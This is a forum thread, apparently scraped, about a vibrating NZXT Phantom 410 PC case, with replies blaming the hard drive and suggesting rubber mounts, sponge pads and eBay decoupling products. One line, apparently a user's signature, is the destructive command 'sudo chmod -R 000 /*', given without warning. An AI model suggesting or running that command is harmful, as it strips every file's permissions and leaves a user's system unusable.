Case is viberating. What to do?

Amit Moryossef

Hey,

I have an NZXT Phantom 410, and even on lowest fan mode, when I touch the metal body (front and sides, not top) , I feel vibreations.

The case is on a cheap plastic moveable (with wheels) legs.

The reason it bothers me, is because My PC is very loud, and I want to do what I can to make it more silent. So, does vibrations amplify/create noise? and what is the best way to handle them.

Thanks 

Hey,

I have an NZXT Phantom 410, and even on lowest fan mode, when I touch the metal body (front and sides, not top) , I feel vibreations.

The reason it bothers me, is because My PC is very loud, and I want to do what I can to make it more silent. So, does vibrations amplify/create noise? and what is the best way to handle them.

Thanks 

Find out what's vibrating usually HDD's or loud fans.

Hey,

Thanks 

Yes, vibrations make noise. The best thing you can do to minimize vibrations is making sure every moving part is mounted on rubber: HDD's, fans and pumps are usually the only moving part in your system, so check those. 

I'd guess it's probably your HDD.

What I may end up doing is finding a way of suspending the HDD that I've got that tends to vibrate my case with rubber bands, that way the vibrations aren't passed to the case.

Specs: CPU - Intel i7 8700K @ 5GHz | GPU - Gigabyte GTX 970 G1 Gaming | Motherboard - ASUS Strix Z370-G WIFI AC | RAM - XPG Gammix DDR4-3000MHz 32GB (2x16GB) | Main Drive - Samsung 850 Evo 500GB M.2 | Other Drives - 7TB/3 Drives | CPU Cooler - Corsair H100i Pro | Case - Fractal Design Define C Mini TG | Power Supply - EVGA G3 850W

It's the hard drive 9/10 times

I'd guess it's probably your HDD.

What I may end up doing is finding a way of suspending the HDD that I've got that tends to vibrate my case with rubber bands, that way the vibrations aren't passed to the case.

I have four in my 410 and I only get the slight hum vibrations from the fans.

Fix the HDD

<THE SILENT ASSASSIN>CPU(Intel i5-4690K)||COOLER(corsair H100i)||MOB(asus Maximus VII Hero ATX)||RAM(16gb of corsair vengeance)||STORAGE(Intel 530 128gb)(Samsung 850 Pro 500gb)(WD 2tb Black)||GRAPHICS(2 x Asus strix 970)||CASE(Nzxt H440)||PSU(Corsair RM750W)>http://pcpartpicker.com/b/Bbpbt6

If it's the fans, you can use vibration-reducing rubber mounts, they're usually pretty cheap. If it's a hard drive, you just need to tighten the screws and the noise should go away.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

Hello,

I belevie you should open the side panel and feel with your hand if its the HDD that vibrates so much and if it is the put an anti-vibration on him.

On the other hand, if the fans vibrate then use anti-vibration frames and it will reduce the noise as well.

Before you do that check everything is tied up.

If none of those isnt working you should check the chassis for loose screws as well. 

I hope i helped you and sorry for my bad english.

Best of Luck!!!  :)

Hello,

I belevie you should open the side panel and feel with your hand if its the HDD that vibrates so much and if it is the put an anti-vibration on him.

On the other hand, if the fans vibrate then use anti-vibration frames and it will reduce the noise as well.

Before you do that check everything is tied up.

If none of those isnt working you should check the chassis for loose screws as well. 

I hope i helped you and sorry for my bad english.

Best of Luck!!!  :)

Thank you everyone! I will check that!

Most of the vibration is lovated in the HDD area so i guess thats it.. do you have any Anti Vibration band / rubber that you recommend? (Only ebay links, amazon does not ship here)

And Angel, my English is kinda shit as well so it was an acctual better message than you sent because these were easier sentences to read than the other comments.

Thank you everyone! I will check that!

Most of the vibration is lovated in the HDD area so i guess thats it.. do you have any Anti Vibration band / rubber that you recommend? (Only ebay links, amazon does not ship here)

And Angel, my English is kinda shit as well so it was an acctual better message than you sent because these were easier sentences to read than the other comments.

Glad i help!! :)

The easiest and cheapest way is:

Find a clean and soft sponge, cut four pieces and make a small holes for the screws. 

Mount them between the hdd and the case.

I never done it, but if you try it i thing it will help you reduce the vibrations and noises. (paint it if you dont want it the way it looks).

If you dont like it or is not working then look at those and decide:

http://www.ebay.com/itm/SHARKOON-8-89cm-3-5-HDD-Entkoppler-Vibe-Fixer-III-Vibrationsdampfer-/361287508835?pt=LH_DefaultDomain_77&hash=item541e69e363

http://www.ebay.com/itm/Lamptron-HDD-Rubber-Screws-PRO-pure-black-/121634709158?pt=LH_DefaultDomain_3&hash=item1c51fe5ea6

http://www.ebay.com/itm/Sharkoon-HDD-Vibe-Fixer-Pro-Adattatore-vano-unitA-di-memorizza-4044951010769-/301589159175?pt=LH_DefaultDomain_101&hash=item46381d5d07

Let me know what you think.  :)